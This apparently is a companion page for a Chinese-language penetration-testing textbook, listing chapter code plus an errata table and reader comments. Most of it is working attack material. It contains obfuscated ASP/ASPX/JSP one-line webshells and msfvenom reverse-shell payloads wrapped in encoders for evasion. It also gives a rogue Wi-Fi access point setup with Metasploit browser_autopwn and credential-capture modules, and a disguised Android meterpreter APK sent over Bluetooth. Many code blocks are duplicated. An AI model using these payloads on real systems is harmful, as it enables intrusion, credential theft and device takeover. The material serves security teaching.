cd the-backdoor-factory
./install.sh
ln -s /usr/share/the-backdoor-factory/backdoor.py /usr/bin/backdoor-factory
一句話木馬
ASP的一句話木馬
<% If Request("l")<>"" Then ExecuteGlobal(Request("l")) %>
<% X=Request("l"):If X<>"" Then Execute(X) %>
<% execute(eval(chr(114) + chr(101) + chr(113) + chr(117) + chr(101) + chr(115) + chr(116))("L")) %>
<% X=Request("l"):If X<>"" Then Execute(X) %>
<% execute(eval(chr(114) + chr(101) + chr(113) + chr(117) + chr(101) + chr(115) + chr(116))("L")) %>
aspx的一句話木馬
<%@ Page Language="Jscript"%>
<%eval(Request.Item["l"],"unsafe");%>
<%@ Page Language = Jscript %>
<%var/*-*-*/P/*-*-*/=/*-*-*/"e"+"v"+/*-*-*/"a"+"l"/*-*-*/+"("+"R"+"e"+/*-*-*/"q"+/*-*-*/"u"+/*-*-*/"e"/*-*-*/+"s"+/*-*-*/"t"+"[/*--*/"L"/*-*-*/]"+ ","+"\""+"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"+"\""+")";eval (/*--*/P/*-*-*/,/*--*/"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"/*--*/);%>
<%eval(Request.Item["l"],"unsafe");%>
<%@ Page Language = Jscript %>
<%var/*-*-*/P/*-*-*/=/*-*-*/"e"+"v"+/*-*-*/"a"+"l"/*-*-*/+"("+"R"+"e"+/*-*-*/"q"+/*-*-*/"u"+/*-*-*/"e"/*-*-*/+"s"+/*-*-*/"t"+"[/*--*/"L"/*-*-*/]"+ ","+"\""+"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"+"\""+")";eval (/*--*/P/*-*-*/,/*--*/"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"/*--*/);%>
JSP的一句話木馬
<% if(request.getParameter("l")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("l"))).write(request.getParameter("m").getBytes()); %>
ASP實例一
dim fs, f, a
a="這邊放入要寫到a.asp的程式碼"
set fs=Server.CreateObject("Scripting.FileSystemObject")
set f=fs.OpenTextFile(server.MapPath("a.asp"),8,true,-1)
f.WriteLine(a)
f.Close
set f=nothing
set fs=nothing
上面程式碼先進行url encode,再傳送到 http://localhost?1=<編碼過的字串>
a="這邊放入要寫到a.asp的程式碼"
set fs=Server.CreateObject("Scripting.FileSystemObject")
set f=fs.OpenTextFile(server.MapPath("a.asp"),8,true,-1)
f.WriteLine(a)
f.Close
set f=nothing
set fs=nothing
ASP實例二
dim fs,r
set fs=Server.CreateObject("Scripting.FileSystemObject")
Set R=fs.OpenTextFile(Server.MapPath("decode.asp"), 1)
do while R.AtEndOfStream = false
Response.Write(Server.HTMLEncode(R.ReadLine)+"
")
loop
set f=nothing
set fs=nothing
上面的程式碼進行url encode,再傳送到 http://localhost?1=<編碼過的字串>:set fs=Server.CreateObject("Scripting.FileSystemObject")
Set R=fs.OpenTextFile(Server.MapPath("decode.asp"), 1)
do while R.AtEndOfStream = false
Response.Write(Server.HTMLEncode(R.ReadLine)+"
")
loop
set f=nothing
set fs=nothing
http://localhost/hole.asp?L=dim%20fs%2Cr%3Aset%20fs%3DServer.CreateObject(%22Scripting.FileSystemObject%22)%3ASet%20R%3Dfs.OpenTextFile(Server.MapPath(%22decode.asp%22)%2C%201)%3Ado%20while%20R.AtEndOfStream%20%3D%20false%3AResponse.Write(Server.HTMLEncode(R.ReadLine)%2B%22%3Cbr%3E%22)%3Aloop%3Aset%20f%3Dnothing%3Aset%20fs%3Dnothing%0A
第15章
msfvenom產製具保護作用的Payload
範例:
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe --platform Windows -a x86 -n 30 LHOST=192.168.158.134 LPORT=4444 > /tmp/game1.exe
msfvenom -p windows/shell_reverse_tcp -f raw -n 30 LHOST=192.168.158.134 LPORT=4444 | msfvenom -e x86/unicode_mixed -i 3 -b '\x00' -f raw -n 10 | msfvenom -e x86/call4_dword_xor-i 2 -b '\x00' -f exe --platform Windows -a x86 -n 30 > /tmp/game2.exe
msfvenom -p windows/shell_reverse_tcp -f raw -n 30 LHOST=192.168.158.134 LPORT=4444 | msfvenom -e x86/unicode_mixed -i 3 -b '\x00' -f raw -n 10 | msfvenom -e x86/call4_dword_xor-i 2 -b '\x00' -f exe --platform Windows -a x86 -n 30 > /tmp/game2.exe
第16章
aircrack-ng工具組
選擇適合aircrack的無線網卡一選擇適合aircrack的無線網卡二
選擇適合aircrack的無線網卡三
airolib-ng
範例:
範例:
airolib-ng LiteDb --stats 查詢資料庫狀態
airolib-ng LiteDb --clean all 清理廢棄的資料並緊縮空間
airolib-ng LiteDb --import essid ssidlist.txt 從文字檔匯入AP名稱
airolib-ng LiteDb --import passwd password.lst 從文字檔匯入密碼字典
airolib-ng LiteDb --batch 計算並儲存PMKs
airolib-ng LiteDb --verify all 驗證資料庫中的所有PMKs
airolib-ng LiteDb --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="Belle";'
airolib-ng LiteDb --sql 'select hex(pmk) from pmk where hex(pmk) like "%03AE9EF%"'
airolib-ng LiteDb --export cowpatty Belle cowexportofBelle.cow 將Belle的資料匯出成compatty格式的檔,以供cowpatty使用
airolib-ng LiteDb --import cowpatty cowexportoftest 從cowpatty格式的檔案(cowexportoftest)匯入AP的資料及PMKs
airolib-ng LiteDb --clean all 清理廢棄的資料並緊縮空間
airolib-ng LiteDb --import essid ssidlist.txt 從文字檔匯入AP名稱
airolib-ng LiteDb --import passwd password.lst 從文字檔匯入密碼字典
airolib-ng LiteDb --batch 計算並儲存PMKs
airolib-ng LiteDb --verify all 驗證資料庫中的所有PMKs
airolib-ng LiteDb --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="Belle";'
airolib-ng LiteDb --sql 'select hex(pmk) from pmk where hex(pmk) like "%03AE9EF%"'
airolib-ng LiteDb --export cowpatty Belle cowexportofBelle.cow 將Belle的資料匯出成compatty格式的檔,以供cowpatty使用
airolib-ng LiteDb --import cowpatty cowexportoftest 從cowpatty格式的檔案(cowexportoftest)匯入AP的資料及PMKs
利用airbase與sslstrip部署偽AP
編輯/etc/dhcp/dhcpd.conf
# Sample configuration file for ISC dhcpd for Debian
#
ddns-update-style none;
log-facility local7;
default-lease-time 60;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.99.255;
option routers 192.168.99.254;
option netbios-name-servers 192.168.99.254;
option domain-name-servers 8.8.8.8;
subnet 192.168.99.0 netmask 255.255.255.0 {
range 192.168.99.100 192.168.99.200;
}
#
ddns-update-style none;
log-facility local7;
default-lease-time 60;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.99.255;
option routers 192.168.99.254;
option netbios-name-servers 192.168.99.254;
option domain-name-servers 8.8.8.8;
subnet 192.168.99.0 netmask 255.255.255.0 {
range 192.168.99.100 192.168.99.200;
}
利用airbase與metasploit部署偽AP
編輯/etc/karma.rc
# browser_autopwn 模擬一個Web站臺
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 192.168.99.254
setg AUTOPWN_PORT 55555
setg AUTOPWN_URI /
set LHOST 192.168.99.254
# 攻擊成功時接聽者
set LPORT 4444
set SRVPORT 55555
set URIPATH /
run
#pop3 抓取所有電子郵件請求
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run -j
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run -j
# ftp 抓取所有 ftp請求
use auxiliary/server/capture/ftp
run -j
# smtp 抓取所有 smtp請求
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run -j
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run -j
# http 抓取所有 http/https 請求
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run -j
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run -j
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 192.168.99.254
setg AUTOPWN_PORT 55555
setg AUTOPWN_URI /
set LHOST 192.168.99.254
# 攻擊成功時接聽者
set LPORT 4444
set SRVPORT 55555
set URIPATH /
run
#pop3 抓取所有電子郵件請求
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run -j
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run -j
# ftp 抓取所有 ftp請求
use auxiliary/server/capture/ftp
run -j
# smtp 抓取所有 smtp請求
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run -j
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run -j
# http 抓取所有 http/https 請求
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run -j
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run -j
A終端機執行
airmon-ng check kill
airmon-ng start wlan0
airbase-ng -C 30 -e linksys -c 9 -v wlan0mon
airmon-ng start wlan0
airbase-ng -C 30 -e linksys -c 9 -v wlan0mon
B終端機執行
ifconfig at0 up 192.168.99.254 netmask 255.255.255.0
dhcpd -cf /etc/dhcp3/dhcpd.conf -at0
dhcpd -cf /etc/dhcp3/dhcpd.conf -at0
C終端機執行
iptables -t nat -F
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s 192.168.99.0/24 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 80 -j REDIRECT --to 80
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 443 -j REDIRECT --to 443
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 110 -j REDIRECT --to 110
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 25 -j REDIRECT --to 25
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 21 -j REDIRECT --to 21
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 465 -j REDIRECT --to 465
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 995 -j REDIRECT --to 995
msfconsole -q -r /etc/karma.rc
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s 192.168.99.0/24 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 80 -j REDIRECT --to 80
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 443 -j REDIRECT --to 443
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 110 -j REDIRECT --to 110
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 25 -j REDIRECT --to 25
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 21 -j REDIRECT --to 21
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 465 -j REDIRECT --to 465
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 995 -j REDIRECT --to 995
msfconsole -q -r /etc/karma.rc
第17章
藍牙的科普知識
Bluesnarfer
AT Command參考資料封裝funny.apk
msfvenom –p android/meterpreter/reverse_tcp -f raw -o ~/funny.apk LHOST=192.168.18.131 LPORT=4444
設置反向連線接聽環境
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.18.131
set LPORT 4444
run
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.18.131
set LPORT 4444
run
將funny.apk傳送給目標主機
bluetooth-sendto --device=40:b8:37:96:d1:b5 ~/funny.apk
第18章
(無資料)
第19章
(無資料)
附錄
(無資料)
勘誤表 (回頁首)
| 頁數(行數) | 修正後文字 | 修正前文字 | 修正說明 |
| 4-2(2) | apt install locate | apt locate | 指令漏打「install」。感謝讀者指正。 |
| 4-11(11) | 將它改成下式:(主要修改如灰底粗體字部分)
ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=127.0.0.1 --mport=9390 --allow-header-host=192.168.18.143
修改後,執行下列二列指令:
systemctl daemon-reload
systemctl restart greenbone-security-assistant.service
|
將它改成下式:(主要修改如灰底粗體字部分)
ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=127.0.0.1 --mport=9390 --allow-header-host=192.168.18.143
| 讀者建議在修正ExecStart內容後,執行systemclt重新載入服務。 但筆者當初實驗,是修改後,關機重開,沒有想到重新載入服務。 |
| 9-55(1) | 執行路徑: 03-Web程序\wpscan 03-Web程序\CMS識別\wpscan 03-Web程序\Web漏洞掃描\wpscan 終端機執行 wpscan 語法:wpscan [OPTIONs] -u URL |
執行路徑: 03-Web程序\webscan 03-Web程序\CMS識別\webscan 03-Web程序\Web漏洞掃描\webscan 終端機執行 webscan 語法:webscan [OPTIONs] -u URL |
指令名稱誤植為webscan |
| 9-65(15) | 語法:clusterd [OPTIONs] -i URL | 語法:clusterd [OPTIONs] -u URL | 誤將參數-i鍵成-u |
| . | . |
page 4-2
回覆刪除chapter 4 apt locate --> apt install locate
page 4-11
4.2.4 /lib/systemd/system/greenbone-security-assistant.service 增加 --allow-header-host=IP 之後
執行
# systemctl daemon-reload
# systemctl restart greenbone-security-assistant.service
感謝您細心指正,尚請您不吝繼續指教!
刪除謝謝您!
您好,我的環境是Win11,VMware Workstation 16,依據書中步驟安裝至圖2-28:將GRUB安裝在MBR後,出現無法建立MBR的錯誤訊息....請教您這要如何解決呢?謝謝您!
回覆刪除您好,我沒有遇過這個問題,或許您可以利用Google搜尋出現的錯誤訊息,也許會有其他人和您遇到相同情況,說不定也伴隨著處理方法。
刪除